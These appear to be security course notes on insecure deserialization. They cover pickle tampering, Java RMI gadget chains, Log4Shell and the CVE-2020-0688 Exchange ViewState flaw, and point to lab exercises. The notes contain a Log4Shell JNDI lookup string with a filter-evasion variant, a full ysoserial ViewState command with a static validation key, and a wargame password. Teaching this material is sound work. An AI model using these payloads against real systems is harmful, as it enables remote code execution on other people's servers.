- serialization/deserialization is a widely-used concept in modern languages for storing objects (structured data)
# example in Python:
import pickle
class A:
def __init__(self, x):
print("construct " + x)
self.x = x
def __del__(self):
print("destruct " + self.x)
# Serialize the class
a = A("hello")
a_bytes = pickle.dumps(a)
construct hello destruct hello
# Deserialize the class
a_bytes = a_bytes[:-5] + b'a' + a_bytes[-4:]
a = pickle.loads(a_bytes)
b'\x80\x04\x95%\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x01A\x94\x93\x94)\x81\x94}\x94\x8c\x01x\x94\x8c\x05hello\x94sb.' destruct hella
Object integrity is lost once you pass it through some untrusted channel - give it to the user to store some temporary data (think authentication cookies stored this way) - send over the network - store it in a database
- sanity checks required: e.g. cryptographically sign serialized objects to maintain integrity
- Java (e.g. RMI) does type checking: the receiving end deserializes the object, checks the type, if the type does not match then destroy the object
note WebGoat seems to be broken, see VulnerableTaskHolder.java
- highly recommend getting/using Kali-Linux (consider getting it as a Virtual Machine(VM)). as it holds useful tools, and keeps the work in one environment.
- Run the following docker image: https://hub.docker.com/r/webgoat/goatandwolf
- Go through A08 - software and data integrity
- Hint: read the introduction to Natas, you will need some of this info.
If Web security is very new, consider starting at Natas0 and work your way up. Try to get a hold of the basics.
(Experienced/advanced) username = natas26 password = 8A506rfIAXbKKk68yJeuTuRq4UfcK70k
- RMI receives an object of a class present in your classpath
- constructs the object, checks the type (mismatch), destroys the object
- the destructor executes arbitrary code from the user
- if anywhere in your classpath you have an object that executes arbitrary code upon destruction, you have a path to RCE
- download ysoserial
- go to https://github.com/archang31/aacs4-writeups/tree/master/BinaryExploitation/SerialKiller
log4shell [wikipedia]
The Java Naming and Directory Interface (JNDI) allows for lookup of Java objects at program runtime given a path to their data. […]
In the default configuration, when logging a string, Log4j 2 performs string substitution on expressions of the form
. […] Among the recognized expressions is${jndi:<lookup>};
by specifying the lookup to be through LDAP, an arbitrary URL may be queried and loaded as Java object data.${jndi:ldap://example.com/file}
[…] will load data from that URL if connected to the Internet. By inputting a string that is logged, an attacker can load and execute malicious code hosted on a public URL. […]
Because HTTP requests are frequently logged, a common attack vector is placing the malicious string in the HTTP request URL or a commonly logged HTTP header, such as User-Agent.
Early mitigations included blocking any requests containing potentially malicious contents, such as
. Such basic string matching solutions can be circumvented by obfuscating the request:${${lower:j}ndi
, for example, will be converted into a JNDI lookup after performing the lowercase operation on the letterj
. Even if an input, such as a first name, is not immediately logged, it may be later logged during internal processing and its contents executed.
Source: Swiss CERT
More resources: pentesterland
- Join tryhackme/solar
- Follow the video walkthrough by cryptocat
CVE-2020-0688: RCE on MS Exchange
- Released Feb.25 2020
- Exchange servers had the same
on all installs ViewState
is server-side data that ASP.NET web applications store in serialized format on the client- Having access to the secret keys (it was the same for all MS Exchange
installs) it was possible to craft a malicious
that runs arbitrary code on the server:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "echo OOOPS!!! > c:/Vuln_Server.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="05ae4b41-51e1-4c3a-9241-6b87b169d663" --isdebug –islegacy
Source: Zero Day Initiative
- Marshalling Pickles (Slides + Video)
- ysoserial: Deserialization attack framework for Java
- ysoserial.net: .NET deserialization attack framework
- Are you my type - blackhat 2012
- Remote code execution on Microsoft Exchange
- Log4j vulnerability explained
- https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/